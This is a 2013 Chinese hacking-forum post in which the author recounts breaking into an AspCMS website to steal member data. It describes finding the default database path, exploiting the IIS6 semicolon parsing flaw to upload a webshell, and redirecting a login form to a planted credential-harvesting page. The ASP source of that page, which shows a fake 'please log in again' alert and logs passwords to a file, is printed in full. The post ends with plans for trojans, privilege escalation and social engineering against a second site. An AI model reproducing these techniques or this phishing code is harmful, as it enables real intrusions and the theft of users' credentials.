【我爱T00LS】小计一次X战过程 很菜的过程

2013-09-03 18:04:46 28 4306
昨天才到学校就看见又要封号了

小计一次X站过程


  某人朋友发来一站点,叫上俺一起搞



在域名后面  一同乱扫, 找到后台




一看是aspcms,   试了试公开的EXP 注入无效··

果断下载源码, 分析  查看了默认数据库为data/%23data.asp



在站上测试了一下,

果断找到了 数据库, 进去之后找到密码

开始了拿SHELL之旅



  然后白盒分析了一下(花了2个小时 。水平比较差,见笑)

在公司相册出发现可以自定义文件名




结合IIS6.0 解析漏洞 成功拿下SHELL



自定义文件名 生成为1.asp;

成功拿下SHELL





当时是要这个站的会员数据...

  发现后台没有会员数据? 如何办?(陷入了沉思中)



当时此战 有个登陆框 登陆到数据服务器




于是在SHELL 下  改了登陆的地址



把action=xx.com 改到了A战的一个自己建了页面login.asp



此页面用来接收密码

Login.asp代码如下

<script>alert(‘由于本站点升级 请重新登陆’)</script>

<%

set fso=server.createobject("scripting.filesystemobject")

if fso.FileExists(server.mappath("log.txt"))=true then

set fin=fso.OpenTextFile(server.mappath("log.txt"))

temp=fin.readall

fin.close

set fin=nothing

end if

set fout=fso.createtextfile(server.mappath("log.txt"))

fout.WriteLine(temp&"user:"&username&"pwd:"&password&"礎time:"&now()&"")

fout.close

set fout=nothing

set fso=nothing

%>

<FORM id=loginForm method=post name=loginForm action="">


<TABLE class=loginT border=1 cellSpacing=0 borderColor=red cellPadding=2


width="100%">


<TBODY>


<TR>


<TD height=35>


<DIV class=font align=right>用户名:</DIV></TD>


<TD><INPUT style="FLOAT: left" id=username class="inputW font" type=text


name=username></TD></TR>


<TR>


<TD height=35>


<DIV class=font align=right>密 码:</DIV></TD>


<TD><INPUT style="FLOAT: left" id=password class="inputW font"


type=password name=password></TD></TR>


<tr>


<td height="35"><div align="right" class="font">验证码:</div></td>


<td>


<input type="text" id="validate" name="validate" class="inputW font w95" onKeyDown="if(event.keyCode==13){loginSub(1);}" style="float:left;"/>


<div id="" style="float:left;">


<img align="middle" id="validateImg" name="validateImg" src="http://111/validate.php" style="float:left;"/>


<a href="#" onClick="changeImg(1);" style="text-decoration: none;font-size:12px;float:left;">&nbsp;看不清</a>








反思: 如何渗透进B战,

1, 管理界面挂马, 搞进管理员个人电脑的机器, 然后从管理员那里拿到B战数据库权限

2. A战提权,  进A站服务器 拿到A战 管理员的相关资料 ,然后社工

3.  社工搞到A站管理员资料,搞进A站管理员个人电脑权限












网速太慢请下载附件吧.大致过程是先查到是什么cms,利用公平的漏洞无效,但数据库是默认的,然后进后台iis6拿到shell.但是后台没有想要的会员数据,于是改了登录处代码来接收密码...

附件传不上? http://pan.baidu.com/share/link?shareid=3387191152&uk=3842628911

关于作者

meao114篇文章1105篇回复

评论28次

要评论?请先  登录  或  注册